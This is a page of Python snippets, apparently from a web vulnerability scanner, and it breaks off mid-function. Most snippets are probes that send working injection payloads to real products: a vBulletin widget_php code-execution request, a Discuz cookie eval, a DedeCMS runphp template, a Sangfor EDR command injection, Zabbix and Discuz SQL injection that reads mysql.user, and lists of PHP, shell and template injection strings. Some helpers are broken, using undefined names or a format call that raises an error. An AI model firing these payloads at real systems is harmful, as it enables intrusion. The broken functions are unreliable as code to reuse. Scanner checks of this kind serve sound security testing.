示例#1
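 def test(self, swf):
     """Probe one SWF path for a reflected ``movieName`` script injection.

     Issues a GET for ``self.url + swf`` with the fixed query string below
     and, when the response is HTTP 200 and the MD5 of its body is listed in
     ``self.md5_list``, appends a finding to ``self.result``.  Returns None in
     every case; the appended entry is the only effect.

     :param swf: path fragment appended to ``self.url`` to reach the SWF file.
     """
     # payload (URL-decoded):  "])}catch(e){if(!window.x){window.x=1;alert("xss")}}
     req = {
         "method": "GET",
         "url": self.url + swf +
         "?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}//",
         "timeout": 10,
         "allow_redirects": False,
         "verify": False,  # TLS certificate validation is switched off for this probe
     }
     r = request(**req)
     # Other blocks in this file treat a None return from request() as a transport failure.
     if r is None or r.status_code != 200:
         return
     # Match on a known body fingerprint rather than on the reflected string itself.
     if getmd5(r.text) not in self.md5_list:
         return
     parser_ = response_parser(r)
     self.result.append({
         "name": self.name,
         "url": self.url,
         "level": self.level,  # 0:Low  1:Medium 2:High
         "detail": {
             "vulmsg": self.vulmsg,
             "request": parser_.getrequestraw(),
             "response": parser_.getresponseraw()
         }
     })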
示例#2
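    def verify(self):
        """Probe each request parameter for PHP code evaluation.

        Only runs when the URL extension starts with ``php`` or is empty.  For
        every parameter in ``params_url`` + ``params_body`` and every template
        in ``payloads``, a request is built via ``getreqfromparam`` and sent; a
        hit is recorded with ``self.save`` when either the MD5 of the random
        marker appears in the body or the response matches the PHP parse-error
        pattern, after which the remaining payloads for that parameter are
        skipped.  Returns None.
        """
        if self.dictdata.get("url").get("extension")[:3] not in ["php", ""]:
            return

        parser = dictdata_parser(self.dictdata)
        params = self.dictdata.get("request").get("params").get("params_url") + \
                 self.dictdata.get("request").get("params").get("params_body")
        num1 = get_random_num(8)
        num1_md5 = getmd5(num1)
        # Raw string: the former non-raw literal relied on "\s" surviving as an
        # unknown escape, which newer Pythons warn about; the bytes are identical.
        regx = r'Parse error: syntax error,.*?\sin\s'
        payloads = (
            "print(md5({}));",
            " print(md5({}));",
            ";print(md5({}));",
            "';print(md5({}));$a='",
            "\";print(md5({}));$a=\"",
            "${{@print(md5({}))}}",
            "${{@print(md5({}))}}\\",
            "'.print(md5({})).'"
        )
        if not params:
            return
        for param in params:
            for payload in payloads:
                # "a" / "w" select how getreqfromparam places the text — presumably
                # append vs. overwrite the parameter value; confirm in dictdata_parser.
                method = "a" if payload[0] == "p" else "w"
                payload = payload.format(num1)
                req = parser.getreqfromparam(param, text=payload, method=method)
                r = request(**req)
                if r is None:
                    continue
                if num1_md5 in r.text:
                    self.save(r, param, payload)
                    break
                if re.search(regx, r.text, re.I | re.S):
                    self.save(r, param, "search rule: " + regx)
                    break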
    def verify(self):
        """Send the ``ajax/render/widget_php`` POST probe and record a hit.

        Skips URLs nested deeper than ``scan_set["max_dir"]`` (default 2)
        directories.  The form body embeds a random marker; a finding is
        appended to ``self.result`` only when the reply is HTTP 200 and the
        MD5 of that marker appears in the body.  Returns None.
        """
        # Honour the directory-depth limit configured in config.py.
        depth_limit = int(scan_set.get("max_dir", 2)) + 2
        if self.url.count("/") > depth_limit:
            return
        marker = get_random_num(5)
        marker_md5 = getmd5(marker)
        probe = {
            "method": "POST",
            "url": self.url,
            "headers": {
                "Content-Type": "application/x-www-form-urlencoded"
            },
            "data": "routestring=ajax/render/widget_php&widgetConfig%5bcode%5d=print(md5({rand}))%3bexit%3b".format(
                rand=marker),
            "timeout": 10,
            "allow_redirects": False,
            "verify": False,
        }
        resp = request(**probe)
        if resp is None:
            return
        if resp.status_code != 200:
            return
        if marker_md5.encode() not in resp.content:
            return
        parsed = response_parser(resp)
        finding = {
            "name": self.name,
            "url": self.url,
            "level": self.level,  # 0:Low  1:Medium 2:High
            "detail": {
                "vulmsg": self.vulmsg,
                "request": parsed.getrequestraw(),
                "response": parsed.getresponseraw()
            }
        }
        self.result.append(finding)
示例#4
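 def verify(self):
     """Send the ``viewthread.php`` cookie-based evaluation probe.

     Skips URLs nested deeper than ``scan_set["max_dir"]`` (default 2)
     directories.  Two cookies carry the probe; a finding is appended to
     ``self.result`` when the reply is HTTP 200 and characters 10–20 of
     MD5(marker) occur in the body.  Returns None.
     """
     # Honour the directory-depth limit configured in config.py.
     if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
         return
     num = get_random_num(4)
     num_md5 = getmd5(num)
     req = {
         "method": "GET",
         "url": self.url + "viewthread.php?tid=10",
         # "headers": self.dictdata.get("request").get("headers"),  # mainly to keep cookies and similar headers
         "cookies": {
             "GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Bsearcharray%5D":
             "/.*/eui",
             "GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Breplacearray%5D":
             "print_r(md5({}))".format(num)
         },
         "timeout": 10,
         "verify": False,
     }
     r = request(**req)
     if r is None or r.status_code != 200:
         return
     # Only a 10-character slice of the digest is searched for.
     if num_md5[10:20].encode() not in r.content:
         return
     parser_ = response_parser(r)
     self.result.append({
         "name": self.name,
         "url": parser_.geturl(),
         "level": self.level,  # 0:Low  1:Medium 2:High
         "detail": {
             "vulmsg": self.vulmsg,
             "request": parser_.getrequestraw(),
             "response": parser_.getresponseraw()
         }
     })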
示例#5
def is_wildcard_dns(domain, istopdomain=False, level=1):
    '''
    Check, with a Redis cache, whether ``domain`` resolves arbitrary subdomains.

    domain: like baidu.com or www.baidu.com
    istopdomain: True --> domain is baidu.com; False --> domain is www.baidu.com,
                 in which case the first label is stripped before testing
    level: 1 on the first call; the second-stage probe is issued with 2

    return :
    True:  a random subdomain resolved (cached in the "dns_wildcard_true" set)
    False: resolution raised (cached in the "dns_wildcard_false" set)
    None:  error, or the level-1 path fell through without a verdict (see below)
    '''
    if not istopdomain:
        domain = ".".join(domain.split(".")[1:])
        if domain == "":
            return None  # nothing left after dropping the host label
    red = getredis()
    key = getmd5(domain)
    if red.sismember("dns_wildcard_true", key):
        return True
    if red.sismember("dns_wildcard_false", key):
        return False
    try:
        r = dns.resolver.Resolver(configure=False)
        r.nameservers = others.dns_servers
        # A random, non-existent label: a wildcard zone answers it anyway.
        answers = r.query('myscan-not-%s-test.%s' %
                          (get_random_str(4).lower(), domain))
        ips = ', '.join(sorted([answer.address for answer in answers]))  # NOTE(review): computed but never used
        if level == 1:
            # NOTE(review): wildcard_test is not defined in this file's visible scope and
            # its return value is discarded, so the level-1 call returns None and caches
            # nothing; presumably this was meant to recurse into is_wildcard_dns(..., 2).
            wildcard_test('any-sub-to.%s' % domain, istopdomain, 2)
        elif level == 2:
            red.sadd("dns_wildcard_true", key)
            return True
    except Exception as e:
        # NOTE(review): any exception — NXDOMAIN, but also timeouts and the NameError
        # above — is cached as "no wildcard"; a narrower except (dns.resolver.NXDOMAIN)
        # would avoid persisting transient failures.
        red.sadd("dns_wildcard_false", key)
        return False
示例#6
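 def verify(self):
     """Send the ``tag_test_action.php`` template-evaluation probe.

     Skips URLs nested deeper than ``scan_set["max_dir"]`` (default 2)
     directories.  The query string carries a random marker; a finding is
     appended to ``self.result`` when the reply is HTTP 200 and characters
     10–20 of MD5(marker) occur in the body.  Returns None.
     """
     # Honour the directory-depth limit configured in config.py.
     if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
         return
     random_str = get_random_num(4)
     req = {
         "method": "GET",
         "url": self.url +
         "tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5"
         + str(random_str) + ";{/dede:field}",
         # Replays the captured request headers (cookies etc.).
         "headers": self.dictdata.get("request").get("headers"),
         "timeout": 10,
         "verify": False,
         "allow_redirects": True
     }
     r = request(**req)
     if r is None or r.status_code != 200:
         return
     # Only a 10-character slice of the digest is searched for.
     if getmd5(str(random_str))[10:20].encode() not in r.content:
         return
     parser_ = response_parser(r)
     self.result.append({
         "name": self.name,
         "url": parser_.geturl(),
         "level": self.level,  # 0:Low  1:Medium 2:High
         "detail": {
             "vulmsg": self.vulmsg,
             "request": parser_.getrequestraw(),
             "response": parser_.getresponseraw()
         }
     })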
示例#7
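 def verify(self):
     """Send the ``index.php?c=api&m=data2`` SQL-evaluation probe.

     Skips URLs nested deeper than ``scan_set["max_dir"]`` (default 2)
     directories.  The query string carries a random marker; a finding is
     appended to ``self.result`` when the reply is HTTP 200 and characters
     10–20 of MD5(marker) occur in the body.  Returns None.
     """
     # Honour the directory-depth limit configured in config.py.
     if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
         return
     random_int = get_random_num(5)
     req = {
         "method": "GET",
         "url": self.url +
         "index.php?c=api&m=data2&auth=582f27d140497a9d8f048ca085b111df&param=action=sql%20sql=%27select%20md5({})%27"
         .format(random_int),
         # Replays the captured request headers (cookies etc.).
         "headers": self.dictdata.get("request").get("headers"),
         "timeout": 10,
         "allow_redirects": False,
         "verify": False,
     }
     r = request(**req)
     if r is None or r.status_code != 200:
         return
     # Only a 10-character slice of the digest is searched for.
     if getmd5(random_int)[10:20].encode() not in r.content:
         return
     parser_ = response_parser(r)
     self.result.append({
         "name": self.name,
         "url": self.url,
         "level": self.level,  # 0:Low  1:Medium 2:High
         "detail": {
             "vulmsg": self.vulmsg,
             "request": parser_.getrequestraw(),
             "response": parser_.getresponseraw()
         }
     })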
示例#8
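 def verify(self):
     """Send the ``jsrpc.php`` error-based SQL probe.

     Skips URLs nested deeper than ``scan_set["max_dir"]`` (default 2)
     directories.  The query string carries a random marker; a finding is
     appended to ``self.result`` when the reply is HTTP 200 and characters
     10–20 of MD5(marker) occur in the body.  Returns None.
     """
     # Honour the directory-depth limit configured in config.py.
     if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
         return
     num = get_random_num(4)
     num_md5 = getmd5(num)
     req = {
         "method": "GET",
         "url": self.url +
         "jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,md5({})),0)"
         .format(num),
         # Replays the captured request headers (cookies etc.).
         "headers": self.dictdata.get("request").get("headers"),
         "timeout": 10,
         "verify": False,
     }
     r = request(**req)
     if r is None or r.status_code != 200:
         return
     # Only a 10-character slice of the digest is searched for.
     if num_md5[10:20].encode() not in r.content:
         return
     parser_ = response_parser(r)
     self.result.append({
         "name": self.name,
         "url": parser_.geturl(),
         "level": self.level,  # 0:Low  1:Medium 2:High
         "detail": {
             "vulmsg": self.vulmsg,
             "request": parser_.getrequestraw(),
             "response": parser_.getresponseraw()
         }
     })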
示例#9
 def is_perfile_doned(self):
     '''
     Report whether this file (``self.getperfile()``) was already processed.

     Characters 10–20 of the MD5 of the file key are looked up in the Redis
     set ``self.keys["perfile"]``.  The first caller registers the key and
     gets False; every later caller gets True.
     '''
     set_name = self.keys.get("perfile")
     digest = getmd5(self.getperfile())[10:20]
     if self.red.sismember(set_name, digest):
         return True
     self.red.sadd(set_name, digest)
     return False
示例#10
    def http_md5(self, dictdata):
        '''
        Return the MD5 string that identifies this request for de-duplication.

        The key is protocol-host-port-method-path-argnames, plus the joined
        argument values when ``db_set["es_uniq"]`` is off.  ``name`` and
        ``value`` come from ``self.getallargs(dictdata)``; the url fields are
        expanded from ``dictdata["url"]`` (extra keys there are ignored by
        format()).
        '''
        method = dictdata.get("request").get("method")
        name, value = self.getallargs(dictdata)
        url_fields = dictdata.get("url")
        if db_set.get("es_uniq"):
            template = "{protocol}-{host}-{port}-{method}-{path}-{argsname}"
            ident = template.format(argsname="".join(name),
                                    method=method,
                                    **url_fields)
        else:
            template = "{protocol}-{host}-{port}-{method}-{path}-{argsname}-{value}"
            ident = template.format(argsname="".join(name),
                                    value="".join(value),
                                    method=method,
                                    **url_fields)
        return getmd5(ident)
示例#11
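    def verify(self):
        """Probe URL and body parameters for error-based SQL injection.

        Skipped for extensions in ``notAcceptedExt`` and when the captured
        response already contains the error markers ``self.search`` looks for
        (a baseline that would make every payload look like a hit).  For each
        parameter the payload list is tried in order: entries whose search
        string is None are checked by ``self.search`` for reflected error
        text, the others by ``self.search_md5`` for characters 10–20 of the
        random marker's MD5.  The first hit ends the loop for that parameter.
        Returns None.
        """
        if self.dictdata.get("url").get("extension") in notAcceptedExt:
            return
        # Baseline: bail out if the original response already looks like an error page.
        parser = dictdata_parser(self.dictdata)
        if self.search(parser.getresponsebody(),
                       "Null payload , errors in response text "):
            return
        # Parameter injection (URL and body parameters).
        random_num = get_random_num(8)
        random_num_md5 = getmd5(random_num)
        payloads = [
            ('鎈\'"\(', None, "a"),
            ('"and/**/extractvalue(1,concat(char(126),md5({})))and"'.format(
                random_num), random_num_md5, "a"),
            ("'and/**/extractvalue(1,concat(char(126),md5({})))and'".format(
                random_num), random_num_md5, "a"),
            ("'and(select'1'from/**/cast(md5({})as/**/int))>'0".format(
                random_num), random_num_md5, "a"),
            ('"and(select\'1\'from/**/cast(md5({})as/**/int))>"0'.format(
                random_num), random_num_md5, "a"),
            ("'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','{}')))>'0"
             .format(random_num), random_num_md5, "a"),
            ('"and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes(\'MD5\',\'{}\')))>"0'
             .format(random_num), random_num_md5, "a"),
            ("'and/**/extractvalue(1,concat(char(126),md5({})))and'".format(
                random_num), random_num_md5, "a"),
            ('"and/**/extractvalue(1,concat(char(126),md5({})))and"'.format(
                random_num), random_num_md5, "a"),
            ("/**/and/**/cast(md5('{}')as/**/int)>0".format(random_num),
             random_num_md5, "a"),
            ("convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','{}')))".
             format(random_num), random_num_md5, "w"),
            ("extractvalue(1,concat(char(126),md5({})))".format(random_num),
             random_num_md5, "w")
        ]
        params = self.dictdata.get("request").get("params").get("params_url") + \
                 self.dictdata.get("request").get("params").get("params_body")
        if not params:
            return
        for param in params:
            for payload, search_str, method in payloads:
                req = parser.getreqfromparam(param, method, payload)
                # NOTE(review): other blocks in this file treat None from request() as a
                # failed send; r is handed on unchecked here — confirm search()/search_md5()
                # tolerate None.
                r = request(**req)
                if search_str is None:
                    hit = self.search(r, payload)
                else:
                    hit = self.search_md5(r, random_num_md5[10:20], payload)
                if hit:
                    break
        # Cookie injection: not implemented.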
示例#12
    def verify(self):
        """Index the captured request/response into Elasticsearch.

        Works on ``self.dictdata`` in place: the base64 request/response raws
        are decoded to text, headers are stringified, the "others"/"filter"
        keys are dropped, and "source", "url.ip", "url.pathroot" (and, for
        .ico responses, "url.icon_hash") are added.  The document is keyed by
        ``self.http_md5``.  Links extracted from the HTML body become extra
        ``source: "html"`` documents keyed by md5(ip + pathroot + path).  All
        documents go out in one ``helpers.bulk`` call; failures are logged,
        not raised.  Returns None.
        """
        dictdata = self.dictdata  # alias, not a copy: every edit below mutates self.dictdata
        # base64-decode the request and response bodies so they can be searched
        request_raw = base64.b64decode(self.dictdata.get("request").get("raw").encode("utf8"))
        response_raw = base64.b64decode(self.dictdata.get("response").get("raw").encode("utf8"))
        dictdata["request"]["raw"] = request_raw.decode("utf-8", errors="ignore")
        dictdata["response"]["raw"] = response_raw.decode("utf-8", errors="ignore")
        dictdata["request"]["headers"] = str(dictdata["request"]["headers"])
        dictdata["response"]["headers"] = str(dictdata["response"]["headers"])
        if "others" in dictdata.keys():
            del dictdata["others"]
        if "filter" in dictdata.keys():
            del dictdata["filter"]
        dictdata["source"] = "burp"
        # getaddr caches per host; presumably returns None when resolution fails — confirm.
        dictdata["url"]["ip"] = self.getaddr(dictdata.get("url").get("host"))
        dictdata["url"]["pathroot"] = "{protocol}://{host}:{port}/".format(**dictdata.get("url"))
        if dictdata["url"]["extension"] == "ico":
            # "bodyoffset" is where the body starts inside the raw response bytes.
            body = response_raw[int(dictdata.get("response").get("bodyoffset")):]
            dictdata["url"]["icon_hash"] = str(mmh3.hash(base64.b64encode(body)))
        actions = []
        action = {
            "_index": "httpinfo",
            "_id": self.http_md5(dictdata),
            "_source": dictdata
        }
        actions.append(action)

        # get url from html

        urls_from_html = self.get_html_url(dictdata["url"]["url"],
                                           response_raw[int(dictdata.get("response").get("bodyoffset")):].decode(
                                               "utf-8",
                                               "ignore"),
                                           dictdata["response"]["mime_inferred"])
        logger.debug("urls_from_html    total:{}".format(len(urls_from_html)))
        if urls_from_html:
            # Resolve every discovered host (self.hosts — presumably filled by get_html_url;
            # confirm) on 50 threads so the dict_host_ip lookups below are warm.
            mythread(self.getaddr, self.hosts, 50)
            for url_data in urls_from_html:
                # NOTE(review): a host getaddr() never recorded would raise KeyError here.
                url_data["ip"] = self.dict_host_ip[url_data["host"]]
                action_ = {
                    "_index": "httpinfo",
                    "_id": getmd5("{ip}{pathroot}{path}".format(**url_data)),
                    "_source": {"url": url_data,
                                "source": "html",
                                "ts": dictdata["ts"]}
                }
                actions.append(action_)

        try:
            helpers.bulk(others.es_conn, actions)
            logger.debug("es insert {} lines".format(len(actions)))
        except Exception as ex:
            # Best effort: an indexing failure must not abort the scan of this request.
            logger.warning("Plugin {} get error:{}".format(__name__, ex))
            traceback.print_exc()
示例#13
 def find_ip(self):
     """Resolve ``self.domain`` to the comma-joined address list used by this scan.

     IP literals are returned unchanged.  Otherwise the Redis key
     md5("domain_to_ip_" + domain) is consulted first; on a miss ``self.query``
     is run over a copy of ``others.dns_servers`` on 6 threads, the entries it
     leaves in ``self.msg`` (presumably — confirm in query()) are joined with
     commas, cached under that key and returned.
     """
     domain = self.domain
     if is_ipaddr(domain):
         return domain
     cache = getredis()
     cache_key = getmd5("domain_to_ip_" + domain)
     cached = cache.get(cache_key)
     if cached:
         return cached.decode()
     # Fan the lookup out across the configured resolvers.
     mythread(self.query, copy.deepcopy(others.dns_servers), 6)
     joined = ",".join(list(self.msg))
     cache.set(cache_key, joined)
     return joined
示例#14
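 def args_inject(self, data):
     """Send one prepared parameter-injection request and record a hit.

     ``data`` is the 5-tuple ``(req, payload, search_str, random_num_md5, param)``
     built by ``verify``.  A parameter whose MD5 key is already in ``self.found``
     is skipped, so each parameter is reported at most once.  ``search_str is
     None`` selects the reflected-error check (``self.search``); otherwise
     characters 10–20 of the marker digest are searched (``self.search_md5``).
     Returns None.
     """
     req, payload, search_str, random_num_md5, param = data
     param_str = getmd5(str(param))
     if param_str in self.found:
         return
     r = request(**req)
     if r is None:
         return
     if search_str is None:
         hit = self.search(r, payload, param.get("name", ""))
     else:
         hit = self.search_md5(r, random_num_md5[10:20], payload)
     if hit:
         # Runs on worker threads; the check above and this append are not atomic
         # together, so a parameter can occasionally be appended twice — harmless for a dedup hint.
         self.found.append(param_str)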
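 def output(self, msg, insert=False):
     """Rate-limit findings to one per (site, message) via a Redis set.

     ``msg`` is prefixed with the scheme://host part of ``self.url``; characters
     10–18 of the MD5 of that string are the set member.

     With ``insert`` False (a query): returns True when the message has not
     been recorded yet and output may proceed, False otherwise.  With ``insert``
     True: records the message in "myscan_max_output" and returns None.
     """
     msg = "/".join(self.url.split("/")[:3]) + " " + msg
     msgmd5 = getmd5(msg)[10:18]
     red = getredis()
     if insert:
         # A set rather than a counter: the policy is "at most once", not a quota.
         red.sadd("myscan_max_output", msgmd5)
         return None
     # Not yet recorded -> output is allowed.
     return not red.sismember("myscan_max_output", msgmd5)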
示例#16
 def is_perfolder_doned(self):
     '''
     Return the folders from ``self.getperfolders()`` that were not seen before.

     Characters 10–20 of each folder's MD5 are checked against the Redis set
     ``self.keys["perfolder"]``; unseen folders are registered there and
     returned, already-registered ones are dropped.  A falsy folder list
     yields [].
     '''
     folders = self.getperfolders()
     if not folders:
         return []
     set_name = self.keys.get("perfolder")
     fresh = []
     for folder in folders:
         digest = getmd5(folder)[10:20]
         if self.red.sismember(set_name, digest):
             continue
         self.red.sadd(set_name, digest)
         fresh.append(folder)
     return fresh
示例#17
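 def header_inject(self, data):
     """Send one prepared header-injection request and record a hit.

     ``data`` is ``(req, (payload, search_str, k, msg))`` as built by ``verify``:
     ``k`` is the header name and ``msg`` the per-site rate-limit key checked
     through ``self.output``; the request is skipped when that key was already
     reported.  A fresh random number and its MD5 are generated inside this
     method; ``search_str is None`` selects ``self.search``, otherwise
     characters 10–20 of that digest are searched with ``self.search_md5``.
     On a hit ``self.output(msg, True)`` marks the key as reported.  Returns None.
     """
     req, data_ = data
     payload, search_str, k, msg = data_
     if not self.output(msg):
         return
     random_num = get_random_num(8)
     random_num_md5 = getmd5(random_num)
     r = request(**req)
     if r is None:
         return
     if search_str is None:
         hit = self.search(r, payload, "headers's {}".format(k))
     else:
         hit = self.search_md5(r, random_num_md5[10:20], payload)
     if hit:
         self.output(msg, True)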
示例#18
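    def can_output(self, msg, insert=False):
        '''
        Decide whether a finding keyed by ``msg`` may still be reported.

        msg : should url+somename

        insert=False : query.  Returns True when md5(msg) is not yet in the
                       Redis set "myscan_max_output", False (with a debug log)
                       when it is.
        insert=True  : record md5(msg) in that set; returns None.
        '''
        msgmd5 = getmd5(msg)
        red = getredis()
        if insert:
            # A set, not a counter: each message is reported at most once.
            red.sadd("myscan_max_output", msgmd5)
            return None
        if red.sismember("myscan_max_output", msgmd5):
            logger.debug("{} 输出个数已达一次,不再测试输出".format(msg))
            return False
        return True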
示例#19
 def is_perscheme_doned(self):
     '''
     Report whether this request "scheme" was already processed.

     The scheme is protocol + host + port + method + path + the concatenated
     parameter names from ``self.getallargs()``; its MD5 is checked against
     the Redis set ``self.keys["perscheme"]``.  The first caller registers it
     and gets False, later callers get True.
     '''
     url_info = self.dictdata.get("url")
     parts = (
         url_info.get("protocol"),
         url_info.get("host"),
         url_info.get("port"),
         self.dictdata.get("request").get("method"),
         url_info.get("path"),
         "".join(self.getallargs()),
     )
     hashstr = getmd5("{}{}{}{}{}{}".format(*parts))
     set_name = self.keys.get("perscheme")
     if self.red.sismember(set_name, hashstr):
         return True
     self.red.sadd(set_name, hashstr)
     return False
示例#20
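    def getaddr(self, domain):
        """Resolve ``domain`` to one IP string, caching the result in Redis.

        Also records the outcome in ``self.dict_host_ip[domain]`` (the address,
        or None when resolution failed).  Cache layout under
        md5("dnsdata_<domain>"): the address string on success, the empty
        string as a negative entry.  IP literals are returned as-is.

        :param domain: host name or IP literal.
        :return: the resolved address, or None when it could not be resolved.
        """
        if is_ipaddr(domain):
            self.dict_host_ip[domain] = domain
            return domain
        key = getmd5("dnsdata_{}".format(domain))
        dnsdata = self.red.get(key)
        if dnsdata == b"":
            # Negative cache hit: an earlier lookup failed.
            self.dict_host_ip[domain] = None
            return None
        if dnsdata is not None:
            domain_ip = dnsdata.decode()
            self.dict_host_ip[domain] = domain_ip
            return domain_ip
        try:
            # getaddrinfo yields (family, type, proto, canonname, sockaddr) tuples;
            # the last entry's sockaddr[0] is used, which may be an IPv6 string.
            result = socket.getaddrinfo(domain, None)
            domain_ip = result[-1][-1][0]
        except Exception:
            # Broad on purpose: any resolution failure becomes a negative cache entry.
            # NOTE(review): entries carry no TTL, so a transient failure is remembered
            # until the key is removed by hand.
            self.dict_host_ip[domain] = None
            self.red.set(key, "")
            return None
        self.dict_host_ip[domain] = domain_ip
        self.red.set(key, domain_ip)
        return domain_ip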
示例#21
 def verify(self):
     """Probe URL and body parameters for command / expression evaluation.

     Skipped for extensions in ``notAcceptedExt``.  Each payload pairs a
     template with the value ("show") expected back when it is evaluated:
     either num1+num2, num1*num2 or MD5(num1).  For every parameter the
     payloads are tried in order through ``getreqfromparam``; the first
     response whose text contains the expected value is recorded in
     ``self.result`` and the loop moves to the next parameter.  Returns None.
     """
     if self.dictdata.get("url").get("extension").lower() in notAcceptedExt:
         return
     parser = dictdata_parser(self.dictdata)
     params = self.dictdata.get("request").get("params").get("params_url") + \
              self.dictdata.get("request").get("params").get("params_body")
     num1 = get_random_num(4)
     num2 = get_random_num(4)
     num1_num2 = num1 + num2
     num1num2 = num1 * num2
     num1_md5 = getmd5(num1)
     # "method": "a" / "w" select how getreqfromparam places the text — presumably
     # append vs. overwrite the parameter value; confirm in dictdata_parser.
     payloads = (
         {"cmd": "\nexpr {} + {}\n".format(num1, num2), "show": num1_num2, "method": "a"},
         {"cmd": "|expr {} + {}".format(num1, num2), "show": num1_num2, "method": "a"},
         {"cmd": "$(expr {} + {})".format(num1, num2), "show": num1_num2, "method": "a"},
         {"cmd": "&set /A {}+{}".format(num1, num2), "show": num1_num2, "method": "a"},
         {"cmd": "${@var_dump(md5(%s))};" % num1, "show": num1_md5, "method": "w"},
         # NOTE(review): "%" on a string without conversion specifiers raises TypeError,
         # so building this tuple fails before any request is sent.
         {"cmd": "{}*{}" % num1, "show": num1num2, "method": "w"},
         {"cmd": "'-var_dump(md5(%s))-'" % num1, "show": num1_md5, "method": "w"},
         {"cmd": "/*1*/{{%s+%s}}" % (num1, num2), "show": num1_num2, "method": "w"},
         {"cmd": "${%s+%s}" % (num1, num2), "show": num1_num2, "method": "w"},
         {"cmd": "${(%s+%s)?c}" % (num1, num2), "show": num1_num2, "method": "w"},
         {"cmd": "#set($c=%s+%s)${c}$c" % (num1, num2), "show": num1_num2, "method": "w"},
         {"cmd": "<%- {}+{} %>".format(num1, num2), "show": num1_num2, "method": "w"},
     )
     if params:
         for param in params:
             for payload in payloads:
                 req = parser.getreqfromparam(param, text=payload.get("cmd"), method=payload.get("method"))
                 r = request(**req)
                 # NOTE(review): "r != None" — prefer "r is not None" for a None check.
                 if r != None and str(payload.get("show")) in r.text:
                     parser_ = response_parser(r)
                     self.result.append({
                         "name": self.name,
                         "url": parser_.geturl(),
                         "level": self.level,  # 0:Low  1:Medium 2:High
                         "detail": {
                             "vulmsg": self.vulmsg,
                             "param": param.get("name"),
                             "payload": payload,
                             "request": parser_.getrequestraw(),
                             "response": parser_.getresponseraw()
                         }
                     })
                     break
示例#22
 def verify(self):
     """Send the EDR ``slog_client`` POST probe and record a hit.

     Skips URLs nested deeper than ``scan_set["max_dir"]`` (default 2)
     directories.  The JSON body embeds a random string; a finding is appended
     to ``self.result`` when MD5(string) occurs anywhere in the response body
     (no status-code check is made).  Returns None.
     """
     # Honour the directory-depth limit configured in config.py.
     if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
         return
     random_s = get_random_str(6)
     probe_body = r'''{"params":"w=123\"'1234123'\"|echo -n %s |md5sum"}''' % (random_s)
     probe = {
         "method": "POST",
         "url": self.url + "api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9",
         # Replays the captured request headers (cookies etc.).
         "headers": self.dictdata.get("request").get("headers"),
         "timeout": 10,
         "data": probe_body,
         "allow_redirects": False,
         "verify": False,
     }
     resp = request(**probe)
     if resp is None:
         return
     if getmd5(random_s).encode() not in resp.content:
         return
     parsed = response_parser(resp)
     self.result.append({
         "name": self.name,
         "url": self.url,
         "level": self.level,  # 0:Low  1:Medium 2:High
         "detail": {
             "vulmsg": self.vulmsg,
             "request": parsed.getrequestraw(),
             "response": parsed.getresponseraw()
         }
     })
示例#23
def is_cdn_domain(domain):
    '''
    return True ,False

    NOTE(review): the body is a copy of is_wildcard_dns and contains no CDN
    logic.  `level` and `istopdomain` are not defined in this function, so the
    success path always raises NameError, which the broad except turns into
    a False result — and that result is cached in the *wildcard* sets
    ("dns_wildcard_false"), not in "domain_cdn_false" which is what the
    lookups above consult.  As written it never returns True and pollutes the
    wildcard cache; the CDN check still has to be implemented.
    '''
    red = getredis()
    key = getmd5(domain)
    if red.sismember("domain_cdn_true", key):
        return True
    if red.sismember("domain_cdn_false", key):
        return False
    try:
        r = dns.resolver.Resolver(configure=False)
        r.nameservers = others.dns_servers
        answers = r.query('myscan-not-%s-test.%s' %
                          (get_random_str(4).lower(), domain))
        ips = ', '.join(sorted([answer.address for answer in answers]))  # NOTE(review): never used
        if level == 1:  # NOTE(review): `level` is undefined here -> NameError
            wildcard_test('any-sub-to.%s' % domain, istopdomain, 2)  # NOTE(review): both names undefined here
        elif level == 2:
            red.sadd("dns_wildcard_true", key)
            return True
    except Exception as e:
        # NOTE(review): writes to the wildcard set rather than "domain_cdn_false".
        red.sadd("dns_wildcard_false", key)
        return False
示例#24
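    def verify(self):
        """Send the ``faq.php?action=grouppermission`` error-based SQL probe.

        Skips URLs nested deeper than ``scan_set["max_dir"]`` (default 2)
        directories.  The query string carries a random marker; a finding is
        appended to ``self.result`` when the reply is HTTP 200 and characters
        10–20 of MD5(marker) occur in the body.  Returns None.
        """
        # Honour the directory-depth limit configured in config.py.
        if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
            return
        num = get_random_num(4)
        num_md5 = getmd5(num)

        req = {
            "method": "GET",
            "url": self.url +
            "faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,md5({}),0x3a)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23"
            .format(num),
            # "headers": self.dictdata.get("request").get("headers"),  # mainly to keep cookies and similar headers
            "timeout": 10,
            "allow_redirects": False,
            "verify": False,
        }
        r = request(**req)
        if r is None or r.status_code != 200:
            return
        # Only a 10-character slice of the digest is searched for.
        if num_md5[10:20].encode() not in r.content:
            return
        parser_ = response_parser(r)
        self.result.append({
            "name": self.name,
            "url": parser_.geturl(),
            "level": self.level,  # 0:Low  1:Medium 2:High
            "detail": {
                "vulmsg": self.vulmsg,
                "request": parser_.getrequestraw(),
                "response": parser_.getresponseraw()
            }
        })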
示例#25
    def language_init(self):
        """Register the PHP action templates and injection contexts of this module.

        Every action maps to the lower-level action it is built on ("call") and
        the %-formatted template(s) that realise it; "test_*" entries pair a
        probe with the output expected when the action works.  Templates use
        %-formatting, so a literal '%' in PHP code is written as '%%'.
        ``rand`` and ``bash`` are module-level helpers not shown here.
        """
        self.update_actions({
            'render': {
                'call': 'inject',
                'render': """%(code)s""",
                'header': """print_r('%(header)s');""",
